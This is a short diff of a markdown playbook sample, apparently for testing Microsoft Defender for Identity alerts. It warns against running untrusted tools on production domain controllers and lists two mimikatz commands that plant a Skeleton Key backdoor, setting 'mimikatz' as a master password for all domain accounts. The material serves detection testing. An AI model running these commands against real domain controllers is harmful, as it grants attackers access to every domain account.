DanielpFR/MDI/MDI_Playbook_Sample.md

 **Be careful, never run an untrusted tools on a prodcution DC!
 Once the DC is impacted, there is no easy rollback, the DC has to be depromoted!**

-From a command line with a shell on DC, run as AD admin :
+From a command line on a workstation with a shell on DC, run as AD admin :

 *mimikatz # privilege::debug*
 *mimikatz # misc::skeleton*  => "mimikatz" should be the master password